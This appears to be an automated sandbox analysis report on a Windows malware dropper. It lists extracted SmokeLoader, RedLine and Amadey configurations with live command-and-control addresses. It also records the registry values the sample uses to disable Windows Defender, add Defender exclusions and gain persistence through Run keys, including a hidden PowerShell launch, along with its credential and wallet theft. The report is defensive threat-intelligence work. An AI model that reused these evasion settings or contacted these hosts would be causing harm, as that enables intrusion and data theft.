Analysis
-
max time kernel
300s -
max time network
305s -
platform
windows10-1703_x64 -
resource
win10-20231025-en -
resource tags
arch:x64arch:x86image:win10-20231025-enlocale:en-usos:windows10-1703-x64system -
submitted
30/10/2023, 04:48
Static task
static1
Behavioral task
behavioral1
Sample
4451d55722b6f39eb0c95e1309d8fc6258c6d57a8cc80f22c541d369da7ae3ad.exe
Resource
win7-20231020-en
Behavioral task
behavioral2
Sample
4451d55722b6f39eb0c95e1309d8fc6258c6d57a8cc80f22c541d369da7ae3ad.exe
Resource
win10-20231025-en
General
-
Target
4451d55722b6f39eb0c95e1309d8fc6258c6d57a8cc80f22c541d369da7ae3ad.exe
-
Size
1.5MB
-
MD5
a950d019888199f4addf45be70126c81
-
SHA1
d1e4d72ce334eae3a6da8250937cdba0f43acd26
-
SHA256
4451d55722b6f39eb0c95e1309d8fc6258c6d57a8cc80f22c541d369da7ae3ad
-
SHA512
5be2515b58b4f12a0d78dddc9c9cee7858593c1a915592fcdda682d7566f5264320597d3c76dd102e5fa7614f65b22e6dfa48aa4d472aeb45f755c85397d6bc5
-
SSDEEP
24576:ByV8E89cOpdKN94Un+BGw7Rd7o+Q50t+kgDlX2fnWEm/cmqKnuwyS:0Vv85deX+M6s+Q50tBgknWEAcmqAuw
Malware Config
Extracted
smokeloader
2022
http://77.91.68.29/fks/
Extracted
redline
grome
77.91.124.86:19084
Extracted
amadey
3.89
http://77.91.124.1/theme/index.php
-
install_dir
fefffe8cea
-
install_file
explothe.exe
-
strings_key
36a96139c1118a354edf72b1080d4b2f
Extracted
redline
kinza
77.91.124.86:19084
Extracted
smokeloader
up3
Signatures
-
DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
-
Detect ZGRat V1 1 IoCs
resource yara_rule behavioral2/memory/7048-2865-0x0000000000F30000-0x0000000001310000-memory.dmp family_zgrat_v1 -
Glupteba payload 2 IoCs
resource yara_rule behavioral2/memory/6376-2860-0x0000000002DD0000-0x00000000036BB000-memory.dmp family_glupteba behavioral2/memory/6376-2861-0x0000000000400000-0x0000000000D1B000-memory.dmp family_glupteba -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" AppLaunch.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" AppLaunch.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" 45F1.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" 45F1.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" 45F1.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" 45F1.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" AppLaunch.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" AppLaunch.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" 45F1.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" AppLaunch.exe -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 4 IoCs
resource yara_rule behavioral2/memory/4596-75-0x0000000000400000-0x000000000043E000-memory.dmp family_redline behavioral2/memory/68-2487-0x0000000000090000-0x00000000000CE000-memory.dmp family_redline behavioral2/memory/1308-2664-0x0000000000680000-0x00000000006DA000-memory.dmp family_redline behavioral2/memory/1308-2818-0x0000000000400000-0x000000000047E000-memory.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 10 IoCs
description pid Process procid_target PID 3004 created 3248 3004 latestX.exe 55 PID 3004 created 3248 3004 latestX.exe 55 PID 3004 created 3248 3004 latestX.exe 55 PID 3004 created 3248 3004 latestX.exe 55 PID 3004 created 3248 3004 latestX.exe 55 PID 516 created 3248 516 updater.exe 55 PID 516 created 3248 516 updater.exe 55 PID 516 created 3248 516 updater.exe 55 PID 516 created 3248 516 updater.exe 55 PID 516 created 3248 516 updater.exe 55 -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\31839b57a4f11171d6abc8bbc4451ee4.exe = "0" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" 31839b57a4f11171d6abc8bbc4451ee4.exe -
Downloads MZ/PE file
-
Drops file in Drivers directory 2 IoCs
description ioc Process File created C:\Windows\System32\drivers\etc\hosts latestX.exe File created C:\Windows\System32\drivers\etc\hosts updater.exe -
Modifies Windows Firewall 1 TTPs 1 IoCs
pid Process 5376 netsh.exe -
Stops running service(s) 3 TTPs
-
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2852493121-870915337-2715324265-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-2852493121-870915337-2715324265-1000\Control Panel\International\Geo\Nation D2E6.exe Key value queried \REGISTRY\USER\S-1-5-21-2852493121-870915337-2715324265-1000\Control Panel\International\Geo\Nation 2lQ988wn.exe -
Executes dropped EXE 53 IoCs
pid Process 3716 VT7qe04.exe 3816 Qi3AC90.exe 4488 Qd0cO64.exe 3136 mx7GR09.exe 4336 xT7bQ21.exe 5056 1GI28ZB6.exe 3304 2Wo8986.exe 4920 3Ut91WN.exe 4968 4vP982qy.exe 4868 5bx1bm9.exe 4360 explothe.exe 4880 6Rl4He7.exe 3452 7VP5BY20.exe 5448 XH4er0Kd.exe 6684 30B0.exe 6124 In4Ef7vw.exe 6196 pt6Nm6IV.exe 5448 XH4er0Kd.exe 6960 gS0dO2rt.exe 6992 MicrosoftEdgeCP.exe 7068 3610.exe 68 2lQ988wn.exe 3608 43BE.exe 6596 45F1.exe 5432 475A.exe 1308 4AE5.exe 4060 MicrosoftEdgeCP.exe 6724 72F1.exe 6856 toolspub2.exe 6376 31839b57a4f11171d6abc8bbc4451ee4.exe 2540 kos4.exe 3004 latestX.exe 6408 toolspub2.exe 7048 powercfg.exe 3108 LzmwAqmV.exe 816 LzmwAqmV.tmp 5140 MicrosoftEdgeCP.exe 6800 EAudioConverter.exe 8060 CDB5.exe 7956 MicrosoftEdgeCP.exe 7416 D2E6.exe 7460 D364.exe 7784 D411.exe 8056 31839b57a4f11171d6abc8bbc4451ee4.exe 516 updater.exe 7360 csrss.exe 6980 explothe.exe 4332 injector.exe 3724 windefender.exe 408 windefender.exe 5068 explothe.exe 6588 f801950a962ddba14caaa44bf084b55c.exe 5576 explothe.exe -
Loads dropped DLL 5 IoCs
pid Process 5224 rundll32.exe 816 LzmwAqmV.tmp 816 LzmwAqmV.tmp 816 LzmwAqmV.tmp 7048 powercfg.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unexpected DNS network traffic destination 1 IoCs
Network traffic to other servers than the configured DNS servers was detected on the DNS port.
description ioc Destination IP 51.159.66.125 -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\31839b57a4f11171d6abc8bbc4451ee4.exe = "0" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" 45F1.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" 31839b57a4f11171d6abc8bbc4451ee4.exe -
Accesses Microsoft Outlook profiles 1 TTPs 5 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2852493121-870915337-2715324265-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 D2E6.exe Key opened \REGISTRY\USER\S-1-5-21-2852493121-870915337-2715324265-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 D2E6.exe Key opened \REGISTRY\USER\S-1-5-21-2852493121-870915337-2715324265-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 D2E6.exe Key opened \REGISTRY\USER\S-1-5-21-2852493121-870915337-2715324265-1000\SOFTWARE\Microsoft\Office\12.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 D2E6.exe Key opened \REGISTRY\USER\S-1-5-21-2852493121-870915337-2715324265-1000\SOFTWARE\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 D2E6.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 14 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" Qi3AC90.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" VT7qe04.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" 30B0.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" pt6Nm6IV.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" 4451d55722b6f39eb0c95e1309d8fc6258c6d57a8cc80f22c541d369da7ae3ad.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup5 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP005.TMP\\\"" xT7bQ21.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\"" XH4er0Kd.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP006.TMP\\\"" gS0dO2rt.exe Set value (str) \REGISTRY\USER\S-1-5-21-2852493121-870915337-2715324265-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\S-1-5-21-2852493121-870915337-2715324265-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" csrss.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" Qd0cO64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\"" mx7GR09.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" In4Ef7vw.exe Set value (str) \REGISTRY\USER\S-1-5-21-2852493121-870915337-2715324265-1000\Software\Microsoft\Windows\CurrentVersion\Run\socks5 = "powershell.exe -windowstyle hidden -Command \"& 'C:\\Users\\Admin\\AppData\\Local\\Temp\\72F1.exe'\"" 72F1.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 4 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 380 ipinfo.io 313 api.ipify.org 316 api.ipify.org 379 ipinfo.io -
Manipulates WinMonFS driver. 1 IoCs
Roottkits write to WinMonFS to hide directories/files from being detected.
description ioc Process File opened for modification \??\WinMonFS csrss.exe -
Drops file in System32 directory 11 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe -
Suspicious use of SetThreadContext 9 IoCs
description pid Process procid_target PID 5056 set thread context of 5060 5056 1GI28ZB6.exe 77 PID 3304 set thread context of 1256 3304 2Wo8986.exe 79 PID 4968 set thread context of 4596 4968 4vP982qy.exe 84 PID 6992 set thread context of 1008 6992 MicrosoftEdgeCP.exe 132 PID 6856 set thread context of 6408 6856 toolspub2.exe 156 PID 7048 set thread context of 7328 7048 powercfg.exe 175 PID 8060 set thread context of 4464 8060 CDB5.exe 219 PID 516 set thread context of 3392 516 updater.exe 279 PID 516 set thread context of 7808 516 updater.exe 280 -
Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs
Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.
description ioc Process File opened (read-only) \??\VBoxMiniRdrDN 31839b57a4f11171d6abc8bbc4451ee4.exe -
Drops file in Program Files directory 20 IoCs
description ioc Process File created C:\Program Files (x86)\EAudioConverter\is-15IUM.tmp LzmwAqmV.tmp File created C:\Program Files (x86)\EAudioConverter\is-9FL7S.tmp LzmwAqmV.tmp File created C:\Program Files (x86)\EAudioConverter\XML\Styles\is-2CLTH.tmp LzmwAqmV.tmp File opened for modification C:\Program Files (x86)\EAudioConverter\unins000.dat LzmwAqmV.tmp File created C:\Program Files (x86)\EAudioConverter\is-E0LA7.tmp LzmwAqmV.tmp File created C:\Program Files (x86)\EAudioConverter\XML\Styles\is-VBEA9.tmp LzmwAqmV.tmp File created C:\Program Files\Google\Chrome\updater.exe latestX.exe File created C:\Program Files (x86)\EAudioConverter\is-S7Q3P.tmp LzmwAqmV.tmp File created C:\Program Files\Google\Libs\WR64.sys updater.exe File created C:\Program Files (x86)\EAudioConverter\is-OK8J0.tmp LzmwAqmV.tmp File created C:\Program Files (x86)\EAudioConverter\is-BKO07.tmp LzmwAqmV.tmp File created C:\Program Files (x86)\EAudioConverter\is-A1GVB.tmp LzmwAqmV.tmp File created C:\Program Files (x86)\EAudioConverter\is-FVGSU.tmp LzmwAqmV.tmp File created C:\Program Files (x86)\EAudioConverter\XML\Styles\is-2J69L.tmp LzmwAqmV.tmp File created C:\Program Files (x86)\EAudioConverter\is-5J1F2.tmp LzmwAqmV.tmp File opened for modification C:\Program Files (x86)\EAudioConverter\EAudioConverter.exe LzmwAqmV.tmp File created C:\Program Files (x86)\EAudioConverter\unins000.dat LzmwAqmV.tmp File created C:\Program Files (x86)\EAudioConverter\is-FU5FJ.tmp LzmwAqmV.tmp File created C:\Program Files (x86)\EAudioConverter\is-IEGLE.tmp LzmwAqmV.tmp File created C:\Program Files (x86)\EAudioConverter\is-NU0UQ.tmp LzmwAqmV.tmp -
Drops file in Windows directory 48 IoCs
description ioc Process File created C:\Windows\rescache\_merged\3720402701\2219095117.pri MicrosoftEdgeCP.exe File created C:\Windows\rescache\_merged\3720402701\2219095117.pri MicrosoftEdgeCP.exe File created C:\Windows\rescache\_merged\3720402701\2219095117.pri MicrosoftEdgeCP.exe File created C:\Windows\rescache\_merged\3720402701\2219095117.pri MicrosoftEdgeCP.exe File created C:\Windows\rescache\_merged\3720402701\2219095117.pri MicrosoftEdgeCP.exe File created C:\Windows\rescache\_merged\3720402701\2219095117.pri MicrosoftEdgeCP.exe File created C:\Windows\rescache\_merged\3720402701\2219095117.pri MicrosoftEdgeCP.exe File created C:\Windows\rescache\_merged\3720402701\2219095117.pri MicrosoftEdgeCP.exe File created C:\Windows\rescache\_merged\3720402701\2219095117.pri MicrosoftEdgeCP.exe File created C:\Windows\rescache\_merged\3720402701\2219095117.pri MicrosoftEdgeCP.exe File created C:\Windows\rescache\_merged\3720402701\2219095117.pri MicrosoftEdgeCP.exe File created C:\Windows\rescache\_merged\3720402701\2219095117.pri MicrosoftEdgeCP.exe File created C:\Windows\rescache\_merged\3720402701\2219095117.pri MicrosoftEdgeCP.exe File created C:\Windows\rescache\_merged\3720402701\2219095117.pri MicrosoftEdgeCP.exe File created C:\Windows\rescache\_merged\3720402701\2219095117.pri MicrosoftEdgeCP.exe File created C:\Windows\rescache\_merged\3720402701\2219095117.pri MicrosoftEdgeCP.exe File opened for modification C:\Windows\Debug\ESE.TXT MicrosoftEdge.exe File created C:\Windows\rescache\_merged\3720402701\2219095117.pri MicrosoftEdgeCP.exe File created C:\Windows\rescache\_merged\3720402701\2219095117.pri MicrosoftEdgeCP.exe File opened for modification C:\Windows\windefender.exe csrss.exe File created C:\Windows\rescache\_merged\3720402701\2219095117.pri MicrosoftEdgeCP.exe File created C:\Windows\rescache\_merged\3720402701\2219095117.pri MicrosoftEdgeCP.exe File created C:\Windows\rescache\_merged\3720402701\2219095117.pri MicrosoftEdgeCP.exe File created C:\Windows\rescache\_merged\3720402701\2219095117.pri MicrosoftEdgeCP.exe File created C:\Windows\rescache\_merged\3720402701\2219095117.pri MicrosoftEdgeCP.exe File created C:\Windows\rescache\_merged\3720402701\2219095117.pri MicrosoftEdge.exe File created C:\Windows\rescache\_merged\3720402701\2219095117.pri MicrosoftEdgeCP.exe File created C:\Windows\rescache\_merged\3720402701\2219095117.pri MicrosoftEdgeCP.exe File created C:\Windows\rescache\_merged\3720402701\2219095117.pri MicrosoftEdgeCP.exe File created C:\Windows\rescache\_merged\3720402701\2219095117.pri MicrosoftEdgeCP.exe File created C:\Windows\rescache\_merged\3720402701\2219095117.pri MicrosoftEdgeCP.exe File created C:\Windows\rescache\_merged\3720402701\2219095117.pri MicrosoftEdgeCP.exe File created C:\Windows\rescache\_merged\3720402701\2219095117.pri MicrosoftEdgeCP.exe File created C:\Windows\rescache\_merged\3720402701\2219095117.pri MicrosoftEdgeCP.exe File created C:\Windows\rescache\_merged\3720402701\2219095117.pri MicrosoftEdgeCP.exe File created C:\Windows\rescache\_merged\3720402701\2219095117.pri MicrosoftEdgeCP.exe File created C:\Windows\rescache\_merged\3720402701\2219095117.pri MicrosoftEdgeCP.exe File opened for modification C:\Windows\rss 31839b57a4f11171d6abc8bbc4451ee4.exe File created C:\Windows\rescache\_merged\3720402701\2219095117.pri MicrosoftEdgeCP.exe File created C:\Windows\rss\csrss.exe 31839b57a4f11171d6abc8bbc4451ee4.exe File created C:\Windows\windefender.exe csrss.exe File created C:\Windows\rescache\_merged\3720402701\2219095117.pri MicrosoftEdgeCP.exe File created C:\Windows\rescache\_merged\3720402701\2219095117.pri MicrosoftEdgeCP.exe File created C:\Windows\rescache\_merged\3720402701\2219095117.pri MicrosoftEdgeCP.exe File created C:\Windows\rescache\_merged\3720402701\2219095117.pri MicrosoftEdgeCP.exe File created C:\Windows\rescache\_merged\3720402701\2219095117.pri MicrosoftEdgeCP.exe File created C:\Windows\rescache\_merged\3720402701\2219095117.pri MicrosoftEdgeCP.exe File created C:\Windows\rescache\_merged\3720402701\2219095117.pri MicrosoftEdgeCP.exe -
Launches sc.exe 11 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 7884 sc.exe 4688 sc.exe 2848 sc.exe 6908 sc.exe 6564 sc.exe 192 sc.exe 7980 sc.exe 5468 sc.exe 7532 sc.exe 6424 sc.exe 1780 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 3 IoCs
pid pid_target Process procid_target 4084 1256 WerFault.exe 79 6396 1008 WerFault.exe 132 7540 7328 WerFault.exe 175 -
Checks SCSI registry key(s) 3 TTPs 6 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 3Ut91WN.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 3Ut91WN.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 3Ut91WN.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI toolspub2.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI toolspub2.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI toolspub2.exe -
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2632 schtasks.exe 7384 schtasks.exe 6164 schtasks.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2852493121-870915337-2715324265-1000\Software\Microsoft\Internet Explorer\Main browser_broker.exe Key created \REGISTRY\USER\S-1-5-21-2852493121-870915337-2715324265-1000\Software\Microsoft\Internet Explorer\Main MicrosoftEdgeCP.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-171 = "Central Daylight Time (Mexico)" 31839b57a4f11171d6abc8bbc4451ee4.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-92 = "Pacific SA Standard Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-91 = "Pacific SA Daylight Time" windefender.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-371 = "Jerusalem Daylight Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-81 = "Atlantic Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1721 = "Libya Daylight Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-2002 = "Cabo Verde Standard Time" windefender.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-512 = "Central Asia Standard Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-331 = "E. Europe Daylight Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2412 = "Marquesas Standard Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-562 = "SE Asia Standard Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created 